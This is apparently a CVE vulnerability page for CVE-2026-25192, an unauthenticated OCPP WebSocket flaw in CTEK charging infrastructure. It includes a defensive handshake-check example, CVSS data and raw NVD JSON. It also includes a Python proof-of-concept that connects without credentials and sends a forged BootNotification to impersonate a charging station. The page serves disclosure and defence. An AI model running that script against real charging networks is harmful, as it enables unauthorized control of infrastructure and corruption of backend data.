Security Vulnerability Report
CVE-2026-25192 CVSS 9.4 CRITICAL

CVE-2026-25192

Published: 2026-03-20 23:16:43
Last Modified: 2026-05-06 15:19:42

Description

WebSocket endpoints lack proper authentication mechanisms, enabling attackers to perform unauthorized station impersonation and manipulate data sent to the backend. An unauthenticated attacker can connect to the OCPP WebSocket endpoint using a known or discovered charging station identifier, then issue or receive OCPP commands as a legitimate charger. Given that no authentication is required, this can lead to privilege escalation, unauthorized control of charging infrastructure, and corruption of charging network data reported to the backend.
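A server-side handshake check that closes the gap described above, as an added example (not code from the vendor or from this advisory). It assumes stations connect to `/ocpp/<station id>` over TLS and present HTTP Basic credentials whose username must equal that identifier; `authorize_handshake`, `SAMPLE_STORE` and the sample key are hypothetical names and constructed values.

```python
import base64
import hashlib
import hmac

def hash_key(password: bytes, salt: bytes) -> bytes:
    # Slow, salted hash so a leaked store does not reveal station keys.
    return hashlib.pbkdf2_hmac("sha256", password, salt, 100_000)

# Constructed sample store: station id -> (salt, hash of that station's key).
SAMPLE_STORE = {
    "CP001": (b"constructed-salt", hash_key(b"constructed-station-key", b"constructed-salt")),
}

def basic_header(user: str, password: str) -> dict:
    # Header a provisioned station would send with its upgrade request.
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}

def authorize_handshake(path: str, headers: dict, store: dict):
    """Decide, before the WebSocket upgrade, whether the caller may act as
    the station named in the URL. Returns (allowed, station id or reason)."""
    parts = path.strip("/").split("/")
    if len(parts) != 2 or parts[0] != "ocpp" or not parts[1]:
        return False, "no station identifier in path"
    station_id = parts[1]

    scheme, _, token = headers.get("Authorization", "").partition(" ")
    if scheme.lower() != "basic" or not token:
        return False, "missing credentials"
    try:
        user, sep, password = base64.b64decode(token, validate=True).partition(b":")
    except ValueError:
        return False, "malformed credentials"
    if not sep:
        return False, "malformed credentials"

    # Knowing an identifier is not enough: the authenticated identity
    # must be the same station the URL claims to be.
    if not hmac.compare_digest(user, station_id.encode()):
        return False, "identity mismatch"

    salt, expected = store.get(station_id, (b"unknown-station", b""))
    # Hash even for unknown stations so timing does not reveal valid ids.
    if not hmac.compare_digest(hash_key(password, salt), expected):
        return False, "bad credentials"
    return True, station_id
```

Reject the upgrade with HTTP 401 whenever the first element is `False`, and log the reason together with the source address so repeated attempts against known identifiers are visible.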

CVSS Details

CVSS Score: 9.4
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:ctek:charge_portal:-:*:*:*:*:*:*:* - VULNERABLE
CTEK Charging Station: all affected versions (see the vendor advisory for details)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import websocket
import json

# PoC for CVE-2026-25192: Unauthenticated OCPP Connection
# Description: Connect to the vulnerable WebSocket endpoint without credentials
# and impersonate a charging station.

def exploit_ocpp(target_host, charge_box_id):
    # Construct the WebSocket URL (usually /ocpp or similar)
    ws_url = f"ws://{target_host}/ocpp"

    try:
        print(f"[*] Connecting to {ws_url} as {charge_box_id}...")
        # Establish connection without authentication headers
        ws = websocket.create_connection(ws_url)

        # Craft a malicious BootNotification message (OCPP 1.6)
        payload = [
            2,
            "1",
            "BootNotification",
            {
                "chargePointVendor": "AttackerVendor",
                "chargePointModel": "PoCModel",
                "chargePointSerialNumber": "Hacked001"
            }
        ]

        print("[*] Sending malicious BootNotification...")
        ws.send(json.dumps(payload))

        # Wait for response from the central system
        response = ws.recv()
        print(f"[+] Server Response: {response}")

        # If accepted, we can now send other commands (e.g., MeterValues, StatusNotification)
        print("[+] Impersonation successful. Attacker can now issue OCPP commands.")

        ws.close()

    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target IP and a valid/known ChargeBox ID
    target = "192.168.1.100"
    cbox_id = "CP001"
    exploit_ocpp(target, cbox_id)

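References

https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-078-06.json (Product)
https://www.cisa.gov/news-events/ics-advisories/icsa-26-078-06 (US Government Resource, Third Party Advisory)
https://www.ctek.com/support (Product)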

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25192", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:42.780", "lastModified": "2026-05-06T15:19:41.897", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebSocket endpoints lack proper authentication mechanisms, enabling attackers to perform unauthorized station impersonation and manipulate data sent to the backend. An unauthenticated attacker can connect to the OCPP WebSocket endpoint using a known or discovered charging station identifier, then issue or receive OCPP commands as a legitimate charger. Given that no authentication is required, this can lead to privilege escalation, unauthorized control of charging\ninfrastructure, and corruption of charging network data reported to the backend."}, {"lang": "es", "value": "Los puntos finales WebSocket carecen de mecanismos de autenticación adecuados, lo que permite a los atacantes realizar suplantación de estación no autorizada y manipular datos enviados al backend. Un atacante no autenticado puede conectarse al punto final WebSocket OCPP utilizando un identificador de estación de carga conocido o descubierto, luego emitir o recibir comandos OCPP como un cargador legítimo. 
Dado que no se requiere autenticación, esto puede llevar a la escalada de privilegios, control no autorizado de la infraestructura de carga y corrupción de los datos de la red de carga informados al backend."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": 
"NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ctek:charge_portal:-:*:*:*:*:*:*:*", "matchCriteriaId": "C757F5E2-F4E7-464D-9184-BD665287E411"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-078-06.json", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-078-06", "source": "[email protected]", "tags": ["US Government Resource", "Third Party Advisory"]}, {"url": "https://www.ctek.com/support", "source": "[email protected]", "tags": ["Product"]}]}}